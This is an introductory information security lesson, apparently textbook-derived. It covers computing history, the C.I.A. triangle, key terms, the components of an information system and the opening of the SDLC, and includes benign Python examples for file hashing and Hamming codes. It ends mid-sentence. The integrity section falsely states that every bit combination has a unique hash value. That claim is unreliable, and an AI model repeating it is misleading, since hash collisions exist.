Lesson One Introduction To Information Security

This document serves as an introduction to information security, outlining its evolution from computer security during World War II to the modern complexities of protecting interconnected networks. It details key historical developments, significant reports, and the foundational concepts of information security, including the importance of confidentiality, integrity, and availability. Additionally, it defines essential terms and concepts, emphasizing the need for multiple layers of security within organizations to safeguard data and systems against various threats.


LESSON ONE INTRODUCTION TO INFORMATION SECURITY

Course Intended Learning Outcomes:

After you've finished reading this information, you should be able to:

• Define the concept of information security;
• Describe the evolution of computer security into information security by recounting the history of computer security;
• Define important terms and concepts in information security;
• Identify the stages of the development life cycle for security systems; and
• Describe the functions of information security specialists in a company.

Information Security in the Past

Computer security is where the history of information security begins.

When the first mainframes, created to facilitate computations for communication code breaking (see Figure 1-1), were put to use during World War II, the demand for computer security arose: the requirement to secure physical locations, hardware, and software against threats. To protect these mainframes and ensure the integrity of their data, multiple levels of protection were created. Badges, keys, and security guards' recognition of authorized personnel by sight were used to control access to critical military facilities, for example. As the necessity to ensure national security grew, computer security safeguards became increasingly complicated and technologically advanced.

Information security was a simple procedure in those days, consisting primarily of physical security and rudimentary document classification techniques. Physical theft of equipment, espionage against the systems' products, and sabotage were the main security risks.

Figure 1-1 The Enigma Machine


The decade of the 1960s

Many more mainframes were brought online during the Cold War to perform more complicated and sophisticated jobs. It became important to make it possible for these mainframes to interact using a less time-consuming method than mailing magnetic tapes between data centers. In response to this necessity, the Department of Defense's Advanced Research Project Agency (ARPA) began investigating the feasibility of a redundant, networked communications system to support the military's information exchange. From the beginning, Larry Roberts, dubbed the "Father of the Internet," developed the project, which was known as ARPANET. The ARPANET was the Internet's forerunner (see Figure 1-2 for an excerpt from the ARPANET Program Plan).

Figure 1-2 Development of the ARPANET Program Plan (ARPANET Program Plan, June 3, 1968). Source: Courtesy of Dr. Lawrence Roberts
1970s and 1980s

ARPANET gained in popularity and use over the next decade, increasing the potential for abuse. Robert M. "Bob" Metcalfe, the man who is credited with inventing Ethernet, one of the most widely used networking protocols, saw major flaws in ARPANET security. Individual remote locations lacked the controls and safeguards needed to keep data safe from unwanted remote users. Other issues included password structure and format vulnerability, a lack of safety procedures for dial-up connections, and a lack of user identification and authorization to the system. Hackers had easy access to ARPANET because phone numbers were widely circulated and openly advertised on the walls of phone booths. Because of the wide breadth and frequency of computer security infractions, as well as the expansion in the number of hosts and users on ARPANET, network security was dubbed "network insecurity" in 1978. It was centered on an ARPA project to discover operating system security flaws. (See Table 1-1 for a timeline that covers this and other significant computer security studies.)

The Rand Report R-609, a single report sponsored by the Department of Defense that attempted to define the many controls and processes necessary for the protection of a multilevel computer system, sparked a movement toward security that went beyond guarding physical places. The document was kept secret for almost a decade and is now regarded as the paper that kick-started the field of computer security research.

In the spring and summer of 1967, researchers raised concerns about the security, or lack thereof, of systems sharing resources within the Department of Defense. Systems were rapidly being acquired at the time, and safeguarding them was a top priority for both the military and the defense industry.
Table 1-1 Key Dates for Seminal Works in Early Computer Security

Date  Document

1968  In Time-Sharing Computer Systems, Maurice Wilkes examined password security.

1973  In "Preliminary Notes on the Design of Secure Military Computer Systems," Schell, Downey, and Popek looked at the need for more security in military systems.

1975  In the Federal Register, the Federal Information Processing Standards (FIPS) evaluated the Data Encryption Standard (DES).

1978  Bisbey and Hollingworth published "Protection Analysis: Final Report," a report on the ARPA-funded Protection Analysis project, which aimed to better understand operating system security vulnerabilities and investigate the possibility of automated vulnerability detection techniques in existing system software.

1979  "Password Security: A Case History," written by Morris and Thompson, was published in the Communications of the Association for Computing Machinery (ACM). The study looked at the evolution of a password security method for a time-sharing system that may be accessed remotely.

1979  Dennis Ritchie published "On the Security of UNIX" and "Protection of Data File Contents," which describe secure user and group IDs, as well as the challenges that these systems have.

1984  The authors of "UNIX Operating System Security" addressed four "key handles to computer security" in this report: physical control of premises and computer facilities, management commitment to security objectives, staff education, and administrative procedures aiming at increased security.

1984  "No technique can be secure against wiretapping or its equivalent on the computer," Reeds and Weinberger wrote in "File Security and the UNIX System Crypt Command." As a result, no technique can be guaranteed to be secure against the systems administrator or other privileged users... the uninitiated user has no chance.

The Advanced Research Projects Agency established a task group in June 1967 to
investigate the method of safeguarding secret information systems. The Task Force was formed
in October 1967 and met on a regular basis to develop suggestions that eventually became the
Rand Report R-609. The Rand Report R-609 was the first widely acknowledged published
document to address the significance of management and policy issues in computer security. It
was highlighted that the widespread usage of networking components in military information
systems presented security concerns that were not reduced by the usual security policies in
place at the time. This study was a watershed point in computer security history, when the
focus of computer security shifted from physical location and hardware security to encompass
the following:

1. Data protection;
2. Restricting illegal and sporadic access to that data;
3. Involving workers from various levels of the firm in information security issues.

MULTICS is notable because it was the first operating system to integrate security into its basic functions, despite the fact that it is now obsolete. It was a time-sharing operating system for mainframe computers created by a team from General Electric (GE), Bell Labs, and the Massachusetts Institute of Technology (MIT) in the mid-1960s. Not long after the MULTICS project was restructured in mid-1969, several of its developers (Ken Thompson, Dennis Ritchie, Rudd Canaday, and Doug McIlroy) established UNIX, a new system. The UNIX system did not have the several security levels or passwords that the MULTICS system had. Its main purpose, text processing, did not necessitate the same level of security as its predecessor. Even the most basic component of security, the password function, did not become a component of UNIX until the early 1970s. The microprocessor gave rise to the personal computer and a new era of computing in the late 1970s. The PC evolved into the workhorse of modern computing, displacing the data center. In the 1980s, the decentralization of data processing systems paved the way for networking, or the interconnection of personal computers and mainframe computers, allowing the whole computing community to pool their resources.

The Decade of the 1990s

Networks of computers became more popular at the end of the twentieth century, as did the necessity to connect these networks to one another. The Internet, the first worldwide network of networks, was born as a result of this. In the 1990s, the Internet was made available to the general public after previously being restricted to government, university, and industry experts. Almost any computer that could connect to a phone line or an Internet-connected local area network (LAN) could use the Internet. The Internet became omnipresent when it was commercialized, reaching practically every corner of the planet with an ever-expanding range of applications.

The Internet has grown from a means for sharing Defense Department information to an interconnection of millions of networks. Because industry standards for network interconnection did not exist at the time, these connections were initially based on de facto standards. These de facto standards offered nothing to secure information, although some security was introduced as these precursor technologies were extensively adopted and became established industry standards. Early Internet deployment, on the other hand, placed a low focus on security. In reality, many of the current problems with e-mail on the Internet are the result of this early security flaw. Mail server authentication and e-mail encryption did not appear required at the time, when all Internet and e-mail users were (apparently trustworthy) computer scientists. In early computing approaches, security was embedded into the physical environment of the data center that housed the computers. As networked computers became the norm, the capacity to physically safeguard a networked computer was gone, and the information stored on the computer became more vulnerable to security risks.

From 2000 to the Present

Today, the Internet allows millions of insecure computer networks to communicate with one another in real time. The security of each computer's stored data is now dependent on the security of every other computer to which it is linked. In recent years, governments and businesses have become more aware of the need to improve information security, as well as the importance of information security to national defense. The growing threat of cyber-attacks has made governments and businesses more aware of the need to defend computer-controlled control systems of utilities and other critical infrastructure. There is also growing concern about nation-states engaging in information warfare, as well as the prospect that undefended commercial and personal information systems will be victims.

What Exactly Is Security?

In general, security is defined as "the characteristic or state of being secure, to be free from risk." In other words, the goal is to guard against adversaries, those who would do damage, intentionally or unintentionally. National security, for example, is a multilayered structure that safeguards a state's sovereignty, assets, resources, and citizens. A complex system is also required to achieve the proper level of security for a business.

To safeguard its operations, a successful company should have the following numerous layers of security in place:

1. Physical security is preventing illegal access to and misuse of physical items, objects, or spaces.

2. Personnel security refers to the safeguarding of an individual or a group of individuals who have been granted access to an organization's operations.

3. Operations security is safeguarding the specifics of a certain operation or series of actions.

4. Communications security is protecting the communications medium, equipment, and content.

5. Network security refers to the safeguarding of networking components, connections, and data.

6. Information security refers to safeguarding the confidentiality, integrity, and availability of data assets while they are being stored, processed, or transmitted. It is accomplished by the use of policy, education, training, and awareness, as well as technology.

Information security is defined by the Committee on National Security Systems (CNSS) as the protection of information and its critical elements, such as the systems and hardware that use, store, and transmit that information. Information security encompasses the broad areas of information security management, computer and data security, and network security, as shown in Figure 1-3. The CNSS model of information security emerged from the C.I.A. triangle, a concept developed by the computer security industry. Since the invention of the mainframe, the C.I.A. triangle has been the industry standard for computer security. It is built on the three qualities of information that make it valuable to businesses: confidentiality, integrity, and availability. The security of these three information qualities is as crucial now as it has always been, yet the C.I.A. triangle model no longer fully handles the ever-changing environment. Dangers to information confidentiality, integrity, and availability have morphed into a wide range of events, including unintentional or intentional damage, destruction, theft, unintended or unauthorized change, or other misuse from human or nonhuman threats. The development of a more robust model that handles the intricacies of the contemporary information security environment has been motivated by the new environment of many continually emerging threats. The enlarged model includes a list of essential information qualities, which are discussed in the next section. The C.I.A. triangle terminology is retained here because of the range of content that is based on it.

Figure 1-3 Components of Information Security. Source: Course Technology/Cengage Learning
The Basics of Information Security

1. Access. The ability of a subject or object to manipulate, modify, or influence another subject or object. Hackers have unauthorized access to a system, whereas authorized users have legal access. This ability is governed by access controls.

2. Asset. The resource that is being safeguarded within the organization. Assets can be logical, such as a Web site, information, or data, or physical, such as a person, computer system, or other tangible thing. Security activities are focused on assets, particularly information assets, which are what such efforts aim to protect.

3. Attack. An act that can harm or compromise information and/or the systems that support it, whether intentionally or unintentionally. Attacks can be direct or indirect, active or passive, purposeful or inadvertent. A passive attack occurs when someone casually reads sensitive information that was not intended for their use. An attempt to break into an information system by a hacker is a deliberate attack. An unintended attack is a lightning strike that causes a building fire. A hacker using a personal computer to break into a system is committing a direct attack. A hacker who compromises a system and uses it to attack other systems, for example as part of a botnet (slang for robot network), is committing an indirect attack. This set of hacked machines, running software chosen by the attacker, can attack systems and steal user information or execute distributed denial-of-service attacks autonomously or under the attacker's direct supervision. In a direct attack, the threat itself is the source. Indirect attacks are launched through a hacked system or resource that is malfunctioning or under the control of a threat.

4. Control, safeguard, or countermeasure. Mechanisms, rules, or methods for successfully countering attacks, reducing risk, resolving vulnerabilities, and otherwise improving an organization's security.

5. Exploit. A method for compromising a system. The word can be a noun or a verb. Threat agents may try to exploit a system or other information asset by abusing it for personal gain. An exploit can also be a defined procedure for taking advantage of a vulnerability or exposure in software that is either inherent in the product or devised by the attacker. Existing software tools or custom-made software components are used in exploits.

6. Exposure. A condition or state of being exposed. In information security, exposure exists when a vulnerability known to an attacker is present.

7. Loss. A single instance of an information asset being damaged, modified, or disclosed in an unanticipated or illegal manner. When a company's data is stolen, the company suffers a loss.

8. Protection profile or security posture. The whole collection of controls and protections that the business adopts (or fails to apply) to preserve the asset, including policy, education, training and awareness, and technology. The phrases are occasionally used interchangeably with the term security program, although the security program generally also includes managerial components of security, such as planning, people, and subordinate programs.

9. Risk. The likelihood that something unfavorable will occur. Organizations must reduce risk to fit their risk appetite, or the amount and type of risk they are willing to take.

10. Subjects and objects. As shown in Figure 1-5, a computer can be the subject of an attack (the agent entity used to carry out the attack) or the object of an attack (the target entity). When, for example, a computer is compromised (object) and subsequently used to attack other systems (subject), it is both the subject and the object of an attack.

11. Threat. A group of items, people, or other entities that pose a danger to a valuable asset. Threats exist at all times and can be directed or undirected. Hackers, for example, target unsecured information systems intentionally, whereas strong storms threaten buildings and their contents by accident.

12. Threat agent. A threat's specific instance or component. For example, all hackers worldwide make up a common threat, whereas Kevin Mitnick, who was convicted of hacking into phone systems, is a specific threat agent. A lightning strike, a hailstorm, or a tornado is a threat agent that is part of the severe storm threat.

13. Vulnerability. A flaw in a system or defense mechanism that allows it to be attacked or damaged. A software defect, an unguarded system port, and an unlocked door are all instances of vulnerabilities. Some well-known flaws have been investigated, recorded, and published; others are still hidden (or undiscovered).

Crucial Characteristics of Information

Information's worth is determined by the properties it possesses. When a property of information changes, its value either rises or falls, depending on the situation. Some features have a greater impact on the value of information to users than others. This can vary depending on the situation; for example, information timeliness is important because information loses a lot of its value if it is given late. Though both information security experts and end users have a common knowledge of information characteristics, tensions can occur when the necessity to protect data from risks clashes with the end users' need for unrestricted access to the data. End users, for example, may consider a tenth-of-a-second delay in data calculation to be an unwanted irritation. Professionals in the field of information security, on the other hand, may regard a tenth of a second as a small lag that facilitates a critical activity, such as data encryption. The extended C.I.A. triangle represents each important characteristic of information.

The CIA Triad

AVAILABILITY. Availability permits authorized users (persons or computer systems) to access information without interference or obstruction and to receive it in the proper format. Consider research libraries, which require identification before admission. The contents of the library are protected by librarians so that only authorized patrons have access to them. Before a patron gets free access to the book stacks, the librarian must accept identification. When approved users get access to the stacks, they expect to discover the material they need in a usable format and in a language they understand, which in this case usually means bound in a book and written in English.

ACCURACY. When information is free of faults or errors and has the value that the end user expects, it is said to be accurate. If data have been altered, whether purposefully or unintentionally, they are no longer accurate. Take a bank account, for example. You believe that the information on your checking account is a true reflection of your financial situation. External or internal faults can lead to incorrect information in your checking account. The value of the information is affected if a bank teller, for example, incorrectly adds or subtracts too much from your account. Alternatively, you could enter an inaccurate amount into your account register by accident. In any case, an incorrect bank balance could lead to errors, such as bouncing a check.

AUTHENTICITY. Information authenticity refers to the attribute or state of being genuine or original, as opposed to a copy or fabrication. When information is in the same state as when it was created, placed, saved, or transferred, it is said to be authentic. Consider some popular e-mail misconceptions for a moment. When you get e-mail, you assume it was created and sent by a certain person or group; you assume you know where the e-mail came from. This isn't always the case, though. The act of sending an e-mail message with a modified field, known as e-mail spoofing, is an issue for many individuals nowadays, because the modified field is frequently the originator's address. Spoofing the sender's address can deceive e-mail recipients into believing that messages are real, causing them to open e-mail that they would not have otherwise. Spoofing can also change data being sent over a network, as in the example of User Datagram Protocol (UDP) packet spoofing, which allows an attacker to get access to data saved on computers.

Phishing is a type of spoofing in which an attacker tries to get personal or financial information through deception, most commonly by impersonating another person or organization. When done by law enforcement or private detectives, pretending to be someone you are not is referred to as pretexting. When employed in a phishing attack, e-mail spoofing leads users to a Web server that does not represent the organization it claims to represent, with the goal of stealing personal information such as account numbers and passwords.

Pretending to be a bank or brokerage firm, an e-commerce corporation, or an Internet service provider are the most typical variations. Pretexting does not always result in a satisfying end, even when it is authorized. In 2006, Patricia Dunn, the CEO of Hewlett-Packard, gave contract investigators permission to "smoke out" a corporate director suspected of leaking private information. Ms. Dunn eventually left the company due to the unfavorable press that resulted from the incident.
CONFIDENTIALITY. When information is safeguarded from disclosure or exposure to unauthorized individuals or systems, it is said to be confidential. Confidentiality ensures that only those with the necessary rights and privileges have access to information. Confidentiality is violated when information is viewed by unauthorized individuals or systems. You can take a number of steps to maintain information confidentiality, including the following:

1. Classification of data;
2. Document storage that is secure;
3. Implementation of broad security policies;
4. Information custodians and end users must be educated.

Confidentiality, like the majority of information traits, is interdependent on others, and it is most closely tied to the characteristic known as privacy. In Chapter 12, "Legal and Ethical Issues in Security," the relationship between these two traits is discussed in greater depth. When it comes to personal information regarding employees, customers, or patients, secrecy is extremely important. Individuals who trade with an organization, whether it is a federal agency like the Internal Revenue Service or a corporation, want their personal information to be kept private. When businesses reveal confidential information, problems develop. Sometimes this exposure is purposeful, but there are occasions when revelation of sensitive information happens by mistake, for example when confidential material is accidentally e-mailed to someone outside the business rather than to someone inside the organization. Offline: Unintentional Disclosures details several incidents of privacy violations.
Other examples of confidentiality breaches include an employee discarding a document
containing sensitive information without shredding it, or a hacker successfully breaking into a
Web-based organization's internal database and stealing sensitive client information such as
names, addresses, and credit card numbers.
Almost every day, as a customer, you give up pieces of personal information in exchange for
convenience or value. You reveal part of your spending patterns by utilizing a "members only"
card at the grocery shop. When you participate in an online survey, you are exchanging
elements of your personal history in exchange for internet access. Your personal information is
duplicated, sold, replicated, and circulated in bits and pieces, eventually coalescing into profiles
and even whole dossiers about yourself and your life. Salami theft is a criminal enterprise that
employs a similar strategy. A deli worker understands that stealing an entire salami is
impossible, but a few pieces here and there may be taken home without being noticed. The deli
employee eventually steals a full salami. Salami theft occurs in information security when an
employee steals a few pieces of data at a time, knowing that taking more would be caught, but
finally the person acquires something complete or usable.

INTEGRITY. When information is whole, complete, and uncorrupted, it has integrity. When information is vulnerable to corruption, damage, destruction, or other disruption of its authentic state, its integrity is jeopardized. Information might be corrupted as it is being stored or delivered. Many computer viruses and worms are created with the express intent of causing data corruption. As a result, looking for changes in file integrity as indicated by the file's size is one significant way of detecting a virus or worm. File hashing is another important way of ensuring information integrity: a file is read by a particular algorithm that computes a single big integer called a hash value based on the value of the bits in the file. Any combination of bits has a unique hash value. If a computer system applies the same hashing technique to a file and obtains a number that differs from the file's recorded hash value, the file has been compromised, and the information's integrity has been lost. Because information is of no value or use if users cannot verify its integrity, information integrity is the cornerstone of information systems.
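The size-then-hash check described above, as an added example that is not part of the original lesson: it records the size and SHA-256 hash of every file under a directory as a baseline, re-verifies the tree later, and reports what changed. The demo() scenario uses constructed files in a temporary directory and shows why the size check alone is weak: a same-size edit passes the size comparison and is caught only by the hash.

```python
"""Added example (not from the text): integrity baseline with file size and a hash."""
import hashlib
import tempfile
from pathlib import Path
from typing import Dict


def file_hash(path: Path, algorithm: str = "sha256") -> str:
    """Hash a file in chunks so large files do not have to fit in memory."""
    digest = hashlib.new(algorithm)
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(64 * 1024), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(root: Path) -> Dict[str, dict]:
    """Record size and hash of every regular file under root, keyed by relative path."""
    baseline = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            rel = path.relative_to(root).as_posix()
            baseline[rel] = {"size": path.stat().st_size, "sha256": file_hash(path)}
    return baseline


def verify(root: Path, baseline: Dict[str, dict]) -> Dict[str, str]:
    """Compare the current tree with the baseline; one verdict per path."""
    findings = {}
    for rel, recorded in baseline.items():
        path = root / rel
        if not path.is_file():
            findings[rel] = "missing"
        elif path.stat().st_size != recorded["size"]:
            findings[rel] = "size-changed"      # the cheap check is enough here
        elif file_hash(path) != recorded["sha256"]:
            findings[rel] = "hash-changed"      # same size, different bits
        else:
            findings[rel] = "ok"
    for path in root.rglob("*"):
        rel = path.relative_to(root).as_posix()
        if path.is_file() and rel not in baseline:
            findings[rel] = "unexpected"        # a file the baseline never saw
    return findings


def demo() -> Dict[str, str]:
    """Constructed scenario: three baseline files, then four kinds of change."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "balances.txt").write_text("alice 100\nbob 250\n")
        (root / "hosts.txt").write_text("127.0.0.1 localhost\n")
        (root / "notes.txt").write_text("keep me\n")
        baseline = build_baseline(root)
        # Same-size edit: one digit changed, so a size check alone would pass.
        (root / "balances.txt").write_text("alice 900\nbob 250\n")
        # Appended line: the size changes, so the cheap check catches it.
        with open(root / "hosts.txt", "a") as handle:
            handle.write("203.0.113.5 extra-entry\n")
        # A deleted file and a file that was never in the baseline.
        (root / "notes.txt").unlink()
        (root / "dropped.bin").write_bytes(b"\x00" * 16)
        return verify(root, baseline)


if __name__ == "__main__":
    for rel, verdict in sorted(demo().items()):
        print(f"{verdict:13} {rel}")
```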
External influences, such as hackers, aren't always to blame for file corruption. Noise in the transmission medium, for example, might cause data to be corrupted. When data are transmitted on a circuit with a low voltage level, the data can be altered and corrupted. Internal and external hazards to information integrity can be compensated for using redundancy bits and check bits. Algorithms, hash values, and error-correcting codes protect the integrity of the data during transmission. Data that have had their integrity tampered with are resent.
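Check bits in practice, as an added example that is not from the original lesson: an extended Hamming (8,4) code sends four data bits with four parity bits, so the receiver can locate and repair a single bit flipped by line noise, and can recognise a two-bit corruption it cannot repair and ask for a resend, as the text describes. The bit layout and the function names are this example's own choices.

```python
"""Added example (not from the text): extended Hamming (8,4) check bits.

Positions are 1-based as in the usual Hamming layout: parity bits at 1, 2, 4;
data bits at 3, 5, 6, 7; an overall parity bit over those seven is appended
as bit 8, which is what turns single-error correction into single-error
correction plus double-error detection.
"""
from typing import List, Tuple

DATA_POS = (3, 5, 6, 7)
PARITY_POS = (1, 2, 4)


def encode(data: List[int]) -> List[int]:
    """Return the 8-bit codeword for four data bits (each 0 or 1)."""
    if len(data) != 4 or any(b not in (0, 1) for b in data):
        raise ValueError("expected four bits")
    code = [0] * 8                    # index 0 is unused; positions are 1-based
    for pos, bit in zip(DATA_POS, data):
        code[pos] = bit
    # Parity bit p covers every position whose binary form has bit p set;
    # it is chosen so the XOR over all covered positions is zero.
    for p in PARITY_POS:
        for pos in range(1, 8):
            if pos != p and pos & p:
                code[p] ^= code[pos]
    overall = 0
    for pos in range(1, 8):
        overall ^= code[pos]          # parity over the whole 7-bit word
    return code[1:] + [overall]


def corrupt(codeword: List[int], positions: List[int]) -> List[int]:
    """Simulate line noise: flip the given 1-based bit positions (1..8)."""
    noisy = list(codeword)
    for pos in positions:
        noisy[pos - 1] ^= 1
    return noisy


def decode(received: List[int]) -> Tuple[List[int], str]:
    """Return (data bits, status); status is 'ok', 'corrected' or 'resend'."""
    if len(received) != 8 or any(b not in (0, 1) for b in received):
        raise ValueError("expected eight bits")
    code = [0] + list(received[:7])
    syndrome = 0                      # sums to the position of a single error
    for p in PARITY_POS:
        parity = 0
        for pos in range(1, 8):
            if pos & p:
                parity ^= code[pos]
        if parity:
            syndrome += p
    total_parity = received[7]
    for pos in range(1, 8):
        total_parity ^= code[pos]     # 1 means an odd number of bits flipped
    if syndrome == 0 and total_parity == 0:
        status = "ok"
    elif total_parity == 1:
        # Odd count: treat as one flip. Syndrome 0 means only bit 8 flipped.
        if syndrome:
            code[syndrome] ^= 1
        status = "corrected"
    else:
        # Even count but nonzero syndrome: two flips, position not locatable.
        status = "resend"
    return [code[pos] for pos in DATA_POS], status


if __name__ == "__main__":
    word = encode([1, 0, 1, 1])
    print("sent     ", word)
    print("one flip ", decode(corrupt(word, [6])))
    print("two flips", decode(corrupt(word, [2, 6])))
```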
UTILITY. The attribute or state of having value for some goal or end is known as information utility. When information can be used for a certain purpose, it is valuable. It is useless to have information that is available but not in a manner that is understandable to the end user. To a private citizen in the United States, for example, census data may quickly become overwhelming and difficult to analyze. For a politician, though, census data offer details on a district's residents, such as ethnicity, gender, and age. These data can aid in the development of a politician's future campaign strategy.
POSSESSION. The quality or state of ownership or control of information is referred to as "possession." If one acquires information, regardless of format or other features, it is said to be in one's possession. While a violation of confidentiality always results in a breach of possession, a breach of possession does not necessarily result in a breach of confidentiality. Assume a corporation uses an encrypted file system to keep its important customer data. An ex-employee plans to duplicate the tape backups and sell the customer information to the competition. A breach of custody occurs when the tapes are removed from their secure environment. However, because the data are encrypted, neither the employee nor anyone else can read them without the correct decryption tools; thus, no breach of confidentiality has occurred. People who sell company secrets now face harsher fines and the possibility of jail time. Furthermore, employers are becoming increasingly hesitant to recruit people who have a history of dishonesty.

Components of an Information System

An information system (IS), as shown in Figure 1-7, is much more than computer hardware; it
is the full combination of software, hardware, data, people, procedures, and networks that
enable the company to utilize information resources. Information can be input, processed,
output, and stored using these six important components. Each of these IS components has its
own set of strengths and weaknesses, as well as unique features and applications.
Additionally, each component of the information system has its own set of security needs.

SOFTWARE. Applications, operating systems, and various command utilities make up the
software component of the IS. Software is perhaps the most challenging IS component to
safeguard. A significant share of information-related attacks exploit faults in software
programming.
Reports of holes, bugs, vulnerabilities, or other basic faults in software abound in the
information technology sector. In truth, defective software affects many aspects of daily life,
from smartphone crashes to faulty vehicle control computers that result in recalls. Software is
the lifeblood of an organization's information flow. Unfortunately, software products are
frequently developed under project management limitations, which limit time, money, and
people. Information security is frequently introduced as an afterthought rather than being
created as a core component from the start. As a result, software programs become an easy
target for unintentional or deliberate attacks.
HARDWARE. Hardware is the physical technology that houses and executes software, stores and
transfers data, and provides interfaces for entering data into and removing data from a system.
Physical security policies deal with hardware as a physical asset and with how to keep it safe
from harm or theft. Traditional physical security methods, such as locks and keys, restrict
access to and interaction with an information system's hardware components. Because a
breach of physical security can result in the loss of information, it is critical to secure the
physical location of computers as well as the computers themselves. Unfortunately, most
information systems are built on hardware platforms that cannot guarantee any level of
information security if unrestricted access to the hardware is permitted.
Laptop thefts in airports were prevalent before September 11, 2001. As the computer's owner
ran it through the conveyor scanning equipment, a two-person team worked to take it. The
first thief entered the security area ahead of an unwitting target and passed through quickly.
The second thief then stood behind the victim, waiting for the target to place his or her
computer on the luggage scanner. While the computer was being scanned, the second thief
stepped ahead of the victim and approached the metal detector with a large collection of keys,
coins, and other items, stalling the line and allowing the first thief to grab the computer and
flee through a crowded walkway. While the security response to the terrorist attacks of
September 11, 2001 tightened airport security, hardware can still be stolen in airports and
other public places. Although laptops and notebook computers are expensive, the information
contained in them can be worth far more to businesses and individuals.
DATA. A computer system's data must be protected while they are being stored, processed, and
transmitted. Data are frequently an organization's most important asset, and they are therefore
a prime target of malicious attacks. Systems built in recent years are likely to use database
management systems. When done correctly, this should increase the security of both the data
and the application. Unfortunately, many system development projects do not fully utilize the
database management system's security features, and the database is sometimes deployed in
ways that are less secure than traditional file systems.
PEOPLE. People have long been a concern to information security, while being frequently
neglected in computer security considerations. According to legend, around 200 B.C. the
Chinese empire's security and stability were endangered by a massive army. The Hun invaders
were so fearsome that the Chinese emperor ordered the construction of a massive wall to guard
against them. Around 1275 A.D., Kublai Khan ultimately accomplished what the Huns had been
attempting for well over a thousand years. The Khan's army at first attempted to climb over, dig
beneath, and break through the wall.
In the end, the Khan simply bribed the gatekeeper, and the rest is history. Whether or not this
incident occurred, the moral of the story is that people can be the weakest link in a company's
information security program. They will remain the weakest link until policy, education and
training, awareness, and technology are appropriately implemented to prevent people from
accidentally or intentionally damaging or losing information. The human tendency to cut
corners and the ubiquity of human error can be exploited by social engineering, which
manipulates people's actions in order to gain access to system information.
PROCEDURES. Procedures are another aspect of an IS that is usually disregarded. Procedures
are step-by-step instructions for completing a task. When an unauthorized user obtains an
organization's procedures, the integrity of its data is jeopardized. For example, a bank
consultant learned how to wire funds using procedures that were readily available at the
computer center. Taking advantage of a security flaw (the lack of a verification step), this
consultant ordered millions of dollars to be wired to his own account. Before the matter was
resolved, lax security practices had resulted in a loss of over 10 million dollars. Most companies
give procedures to their legitimate employees so that they can access the information system,
but many fail to provide adequate training on how to secure those procedures. Educating staff
about security procedures is as crucial as physically securing the information system.
Procedures, after all, are information in and of themselves. As a result, knowledge of
procedures, like other critical information, should be shared only with those members of the
organization who need to know.
NETWORKS. The networking component of IS is responsible for most of the demand for better
computer and information security. When information systems are linked to form local area
networks (LANs), and these LANs are linked to other networks, such as the Internet, new
security concerns emerge quickly. Physical technology that supports network services is
becoming increasingly affordable for businesses of all sizes. Traditional physical security
methods, such as locks and keys, are still useful for restricting access to and interaction with
the hardware components of an information system; but when computer systems are
networked, this technique is no longer sufficient. Network security measures, as well as the
deployment of alarm and intrusion detection systems to alert system owners to ongoing
intrusions, are critical.

Balancing Information Security and Access

It is difficult to achieve complete information security even with the best design and
implementation. Remember James Anderson's statement, where he stressed the importance of
balancing security and access. Information security is a process, not a goal, so it can't be perfect.
It is possible to make a system accessible to anyone, anywhere, at any time, and using any
method. However, such unrestricted access jeopardizes the information's security. A totally
secure information system, on the other hand, would not allow anyone access. When Microsoft
was challenged to get a TCSEC C-2 level security certification for its Windows operating system,
for example, it had to disable all networking components and run the computer solely from a
console in a secure room.
To establish balance, that is, to operate an information system that satisfies both the user and
the security professional, the security level must allow reasonable access while protecting
against threats. Figure 1-8 depicts some of the competing voices that must be considered when
balancing information security and access. Because of today's security concerns and
difficulties, an information system or data-processing department can become too invested in
system management and security. An imbalance arises when the end user's needs are
overshadowed by a focus on safeguarding and administering information systems. Both
information security professionals and end users must understand that the organization's
overall aims are the same: to ensure that data are available where, when, and how they are
needed, with the fewest delays and impediments possible. Ideally, this level of availability can
be met even while concerns about loss, damage, interception, or destruction are being
addressed.

Approaches to Information Security Implementation

Information security deployment in a business must start somewhere and cannot happen
overnight. Securing data assets is a gradual process that involves teamwork, time, and patience.
Information security might start with a grassroots effort by system administrators to improve
their systems' security; this is known as a bottom-up approach. The technical expertise of
individual administrators is the fundamental benefit of the bottom-up approach. Working with
information systems on a daily basis, these administrators have a wealth of experience that can
substantially aid the construction of a security system. They are aware of and comprehend the
dangers to their systems, as well as the mechanisms required to protect them successfully.
Unfortunately, because it lacks a number of important elements, such as participant support
and organizational staying power, this approach rarely works.
The top-down strategy, in which upper-level managers launch the project by issuing policy,
procedures, and processes, dictating the goals and expected outcomes, and assigning
responsibilities for each required activity, has a greater success rate. Strong upper-
management support, a devoted champion, usually dedicated financing, a clear planning and
implementation procedure, and the ability to influence corporate culture are all features of this
method. A formal development plan known as a systems development life cycle, is also used in
the most successful top-down approach.

Management must completely support and buy into any organization-wide endeavor for it to
succeed. The champion's contribution to this effort cannot be overstated. This advocate is
usually an executive, such as a chief information officer or vice president of information
technology, who drives the project forward, ensures that it is appropriately managed, and
pushes for widespread support. Without this high-level backing, many mid-level administrators
fail to make time for the project or treat it as a low priority. The end users' engagement and
support are also crucial to the success of this type of project. These people are the ones who
will be most affected by the project's process and outcome, so they must be included in the
information security process. Key end users should be assigned to a development team known
as the joint application development (JAD) team. To succeed, the JAD team needs to be
tenacious: it must be able to withstand employee turnover and should not be vulnerable to
changes in the membership of the information security development team. This means that
processes and procedures must be documented and embedded in the culture of the firm, and
the organization's management must accept and promote them. Figure 1-9 depicts the
organizational hierarchy as well as the bottom-up and top-down approaches.

The Systems Development Life Cycle

Information security must be managed in the same way that any other key system in a business
is managed. A version of the systems development life cycle (SDLC) called the security systems
development life cycle (SecSDLC) can be used to construct an information security system in an
organization with little or no formal security in place. To understand the security systems
development life cycle, you must first understand the fundamentals of the methodology.

Methodology and Phases

A methodology for the design and execution of an information system is the systems
development life cycle (SDLC). A methodology is an organized sequence of methods used to
solve an issue in a formal manner. Using a methodology ensures a thorough procedure with a
clear objective, increasing the likelihood of success. Following the adoption of a methodology,
major milestones are created, and a team of personnel is chosen and held- accountable for
achieving the project's objectives.
The classic SDLC is divided into six phases. If you took a systems analysis and design course,
you may have been exposed to a model with a different number of phases. SDLC models can
contain anywhere from three to twelve phases, all of which map onto the six discussed here.
Figure 1-10 depicts a waterfall model in which each phase starts with the outcomes and
information gathered in the preceding phase.
A structured review or reality check follows each phase, during which the team decides
whether the project should be continued, discontinued, outsourced, postponed, or returned
to an earlier phase, based on whether the project is progressing as planned and the need for
